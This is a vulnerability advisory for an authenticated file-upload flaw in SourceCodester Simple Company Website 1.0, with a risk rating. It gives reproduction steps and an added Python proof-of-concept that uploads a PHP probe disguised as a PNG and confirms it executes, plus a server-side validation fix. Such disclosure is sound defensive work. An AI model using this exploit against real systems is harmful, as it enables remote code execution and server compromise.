SourceCodester Simple Company Website Unrestricted File Upload Vulnerability

Vulnerability

A critical arbitrary file upload vulnerability exists in SourceCodester Simple Company Website version 1.0. The flaw is in '/classes/SystemSettings.php' when the 'f' parameter is set to 'update_settings': the handler accepts the uploaded 'img' file on the strength of the client-supplied image MIME type alone and does not validate the file's real content or extension. A PHP script declared as an image is therefore stored under the web-accessible '/uploads/' directory and can be requested and executed through a web browser. Exploitation requires an authenticated admin session (see Reproduction), but the outcome is a complete compromise of the server.

Impact

Exploitation of this vulnerability allows an attacker holding admin credentials (or a hijacked admin session) to upload and execute arbitrary PHP code on the server. This results in remote code execution in the web server's context and can lead to full system compromise, data leakage, unauthorized data modification, and disruption of service.

Reproduction

To reproduce this vulnerability, log into the application as an admin user. Once authenticated, send a multipart POST request to '/classes/SystemSettings.php' with the 'f' parameter set to 'update_settings'. In the 'img' field, include a file that is actually a PHP script but is declared with an image MIME type (for example 'image/png'); no other disguise is needed, because the handler does not inspect the file's content or extension. After the upload, the file is reachable and executed at its path under the '/uploads/' directory.
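The request described above, as an added example that is not part of the original advisory or the project's code. It builds the disguised upload offline with the standard library and sends nothing unless called with a live lab target. Assumptions not stated on the page: the 'f' action is passed as a query parameter, the admin session is a PHPSESSID cookie, and the server keeps the original filename. The payload is a benign probe rather than a web shell, and validate_image_upload() shows the server-side check the handler lacks.

```python
import os
import urllib.request

# Assumptions (not stated in the advisory): action in the ?f= query
# parameter, admin session carried as PHPSESSID, original filename kept.
UPLOAD_PATH = "/classes/SystemSettings.php?f=update_settings"
UPLOAD_DIR = "/uploads/"

# Benign probe instead of a shell: proves execution without granting
# command access. It is declared as image/png on the wire.
PROBE_NAME = "probe.php"
PROBE_CODE = b"<?php echo 'poc:' . php_uname(); ?>"


def build_multipart(fields, files):
    """Return (content_type, body) for a multipart/form-data POST.

    fields: {name: str}; files: {name: (filename, bytes, declared_type)}.
    """
    boundary = "----poc" + os.urandom(8).hex()
    parts = []
    for name, value in fields.items():
        parts.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"'
            f"\r\n\r\n{value}\r\n".encode()
        )
    for name, (filename, content, ctype) in files.items():
        head = (
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"; '
            f'filename="{filename}"\r\nContent-Type: {ctype}\r\n\r\n'
        ).encode()
        parts.append(head + content + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())
    return f"multipart/form-data; boundary={boundary}", b"".join(parts)


def build_upload_request(base_url, session_cookie, filename=PROBE_NAME,
                         content=PROBE_CODE, declared_type="image/png"):
    """Prepare (but do not send) the update_settings upload request.

    Only the Content-Type of the file part is spoofed; the filename and
    the PHP content are sent unchanged, which is what the flaw permits.
    """
    ctype, body = build_multipart({}, {"img": (filename, content, declared_type)})
    req = urllib.request.Request(base_url.rstrip("/") + UPLOAD_PATH,
                                 data=body, method="POST")
    req.add_header("Content-Type", ctype)
    req.add_header("Cookie", f"PHPSESSID={session_cookie}")
    return req


def uploaded_url(base_url, filename=PROBE_NAME):
    """Where the stored file is expected to be served from afterwards."""
    return base_url.rstrip("/") + UPLOAD_DIR + filename


# Magic bytes per allowed extension; the client's Content-Type is ignored.
ALLOWED_IMAGES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def validate_image_upload(filename, content):
    """The missing server-side check: extension allowlist plus magic bytes.

    A real fix should additionally store the file under a random name and
    serve /uploads/ with script execution disabled.
    """
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED_IMAGES:
        return False, f"extension {ext!r} not allowed"
    if not content.startswith(ALLOWED_IMAGES[ext]):
        return False, "content does not match image type for extension"
    return True, "ok"


def send_probe(base_url, session_cookie):
    """Send the upload, then fetch the probe; for an authorised lab only."""
    urllib.request.urlopen(build_upload_request(base_url, session_cookie))
    with urllib.request.urlopen(uploaded_url(base_url)) as resp:
        return resp.read()


if __name__ == "__main__":
    req = build_upload_request("http://127.0.0.1", "SESSION_COOKIE_HERE")
    print(req.full_url)
    print(req.data.decode(errors="replace"))
    print(validate_image_upload(PROBE_NAME, PROBE_CODE))
```

Running the module prints the prepared request so the spoofed part can be compared against what a legitimate image upload looks like; send_probe() only makes sense against an instance you are authorised to test, and a response body starting with "poc:" confirms execution.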

Added: Jun 29, 2025, 9:16 PM
Updated: Jun 29, 2025, 9:16 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 10.0
exploitability: 6.6
remediation: 0.0
relevance: 0.2
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.